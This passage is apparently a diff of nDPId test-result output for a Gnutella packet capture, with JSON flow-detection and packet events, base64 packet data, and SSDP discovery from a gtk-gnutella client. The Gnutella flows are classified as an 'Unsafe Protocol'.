+00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":63001,"flow_last_seen":63261,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":63261,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.147.52.21","src_port":50199,"dst_port":36728,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":63000,"flow_last_seen":63261,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":63261,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.250.6.59","src_port":50196,"dst_port":12556,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":63297,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":63297,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAooAAEAG5kR2qA9HCgACDw9bxBUAZZABIZ4f2mAS\/\/9gyQAAAgQFtA=="} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":63297,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":63297,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoTFBAAIAGHIIKAAIPdqgPR8QVD1shnh\/aAGWQAlAQ+vB9lQAA"} 
+00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":187,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":63001,"flow_last_seen":63309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":63309,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.168.15.71","src_port":50197,"dst_port":3931,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":203,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":64030,"flow_last_seen":64030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":64030,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.238.173.128","src_port":50202,"dst_port":57648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":64030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":64030,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0GZhAAIAG6a4KAAIPPe6tgMQa4TAr3W0hAAAAAIAC+vA+WAAAAgQFtAEDAwgBAQQC"} 
+00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":204,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":64031,"flow_last_seen":64031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":64031,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.222.160.99","src_port":50203,"dst_port":18994,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":204,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":64031,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":64031,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0cDRAAIAGoD8KAAIPPd6gY8QbSjIrqiNHAAAAAIAC+vAskAAAAgQFtAEDAwgBAQQC"} +00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":205,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":64032,"flow_last_seen":64032,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":64032,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.218.26.16","src_port":50204,"dst_port":9728,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":64032,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":64032,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0FX9AAIAGQkwKAAIPfNoaEMQcJgCBbg3uAAAAAIAC+vBXrQAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":206,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":64032,"flow_last_seen":64032,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":64032,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.46.139.171","src_port":50205,"dst_port":52120,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":64032,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":64032,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0XTBAAIAGk6sKAAIPci6Lq8Qdy5gelScRAAAAAIAC+vCU2gAAAgQFtAEDAwgBAQQC"} 
+00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":207,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":64032,"flow_last_seen":64032,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":64032,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"175.181.156.244","src_port":50206,"dst_port":8255,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":64032,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":64032,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0yBFAAIAG2fkKAAIPr7Wc9MQeID9tpdrVAAAAAIAC+vDujQAAAgQFtAEDAwgBAQQC"} +00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":64033,"flow_last_seen":64033,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":64033,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"90.78.171.204","src_port":50207,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":64033,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":64033,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0kpNAAIAGVgcKAAIPWk6rzMQfGMqXoNUlAAAAAIAC+vAYRgAAAgQFtAEDAwgBAQQC"} +00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":64213,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":64213,"pkt":"CAAn5uVZUlQAEjUCCABFAAAoApQAAP8Gwb497q2ACgACD+EwxBoAAAAAK91tIlAUAAB6CAAA"} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":64275,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":64275,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsApUAAEAGjec93qBjCgACD0oyxBsAZ4QBK6ojSGAS\/\/\/MHQAAAgQFtA=="} +00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":64276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":64276,"pkt":"UlQAEjUCCAAn5uVZCABFAAAocDVAAIAGoEoKAAIPPd6gY8QbSjIrqiNIAGeEAlAQ+vDo6QAA"} 
+00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":212,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":64031,"flow_last_seen":64276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":64276,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.222.160.99","src_port":50203,"dst_port":18994,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":64291,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":64291,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsApcAAEAGH32vtZz0CgACDyA\/xB4AaH4BbaXa1mAS\/\/+UGgAAAgQFtA=="} +00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":64291,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":64291,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoyBJAAIAG2gQKAAIPr7Wc9MQeID9tpdrWAGh+AlAQ+vCw5gAA"} 
+00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":64032,"flow_last_seen":64291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":64291,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"175.181.156.244","src_port":50206,"dst_port":8255,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":64717,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":64717,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0GZlAAIAG6a0KAAIPPe6tgMQa4TAr3W0hAAAAAIAC+vA+WAAAAgQFtAEDAwgBAQQC"} +00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":229,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":65061,"flow_last_seen":65061,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":65061,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"119.237.116.22","src_port":50208,"dst_port":8683,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":65061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":65061,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0q8tAAIAGVuYKAAIPd+10FsQgIevuSsSrAAAAAIAC+vDjCgAAAgQFtAEDAwgBAQQC"} +00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":230,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":65061,"flow_last_seen":65061,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":65061,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.206.254","src_port":50209,"dst_port":49587,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":65061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":65061,"pkt":"UlQAEjUCCAAn5uVZCABFAAA02YBAAIAG1DkKAAIPcfzO\/sQhwbNg4z+5AAAAAIAC+vAApAAAAgQFtAEDAwgBAQQC"} 
+00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":231,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":65062,"flow_last_seen":65062,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":65062,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.234.18.166","src_port":50210,"dst_port":61404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":231,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":65062,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":65062,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0pW5AAIAGEbcKAAIPJOoSpsQi79zHbZnNAAAAAIAC+vAbRgAAAgQFtAEDAwgBAQQC"} +00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":232,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":65062,"flow_last_seen":65062,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":65062,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.199.10.60","src_port":50211,"dst_port":23458,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":232,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":65062,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":65062,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0SFBAAIAGjWIKAAIPDscKPMQjW6L9nzYkAAAAAIAC+vD7gwAAAgQFtAEDAwgBAQQC"} +00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":233,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":65062,"flow_last_seen":65062,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":65062,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.17.124.40","src_port":50212,"dst_port":6776,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":233,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":65062,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":65062,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0NVpAAIAG3iEKAAIPXxF8KMQkGnhkTfi6AAAAAIAC+vBRMgAAAgQFtAEDAwgBAQQC"} 
+00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":234,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":65063,"flow_last_seen":65063,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":65063,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.117.153.7","src_port":50213,"dst_port":50138,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":65063,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":65063,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0DWpAAIAG8s4KAAIPVXWZB8Qlw9oAc\/5TAAAAAIAC+vDyzAAAAgQFtAEDAwgBAQQC"} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":235,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":65065,"flow_last_seen":65065,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":0,"thread_ts_msec":65065,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":57623,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":65065,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":65065,"pkt":"AQBef\/\/6CAAn5uVZCABFAADS4KkAAAER3GgKAAIP7\/\/\/+uEXB2wAvizBTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClVTRVItQUdFTlQ6IGd0ay1nbnV0ZWxsYS8xLjIuMiAoMjAyMi0wMi0yNSkNCk1BTjogInNzZHA6ZGlzY292ZXIiDQpTVDogdXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToyDQpNWDogMw0KDQo="} 00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":235,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":65065,"flow_last_seen":65065,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":0,"thread_ts_msec":65065,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":57623,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":65065,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":65065,"pkt":"AQBef\/\/6CAAn5uVZCABFAADS4KoAAAER3GcKAAIP7\/\/\/+uEXB2wAvi3BTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClVTRVItQUdFTlQ6IGd0ay1nbnV0ZWxsYS8xLjIuMiAoMjAyMi0wMi0yNSkNCk1BTjogInNzZHA6ZGlzY292ZXIiDQpTVDogdXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNWDogMw0KDQo="} 
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":65065,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":219,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":219,"pkt_l4_len":185,"thread_ts_msec":65065,"pkt":"AQBef\/\/6CAAn5uVZCABFAADN4KsAAAER3GsKAAIP7\/\/\/+uEXB2wAuZDETS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClVTRVItQUdFTlQ6IGd0ay1nbnV0ZWxsYS8xLjIuMiAoMjAyMi0wMi0yNSkNCk1BTjogInNzZHA6ZGlzY292ZXIiDQpTVDogdXJuOnNjaGVtYXMtdXBucC1vcmc6c2VydmljZTpXQU5JUENvbm5lY3Rpb246Mg0KTVg6IDMNCg0K"} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":65240,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":65240,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAp8AAEAGUxwOxwo8CgACD1uixCMAa2wB\/Z82JWAS\/\/+zDQAAAgQFtA=="} -00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":65241,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":65241,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoSFFAAIAGjW0KAAIPDscKPMQjW6L9nzYlAGtsAlAQ+vDP2QAA"} 
-00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":243,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":65062,"flow_last_seen":65241,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":65241,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.199.10.60","src_port":50211,"dst_port":23458,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":66017,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":66017,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xttAAIAGndgKAAIPsIDZgMQYsIr8Y98AAAAAAIAC+vCOBwAAAgQFtAEDAwgBAQQC"} 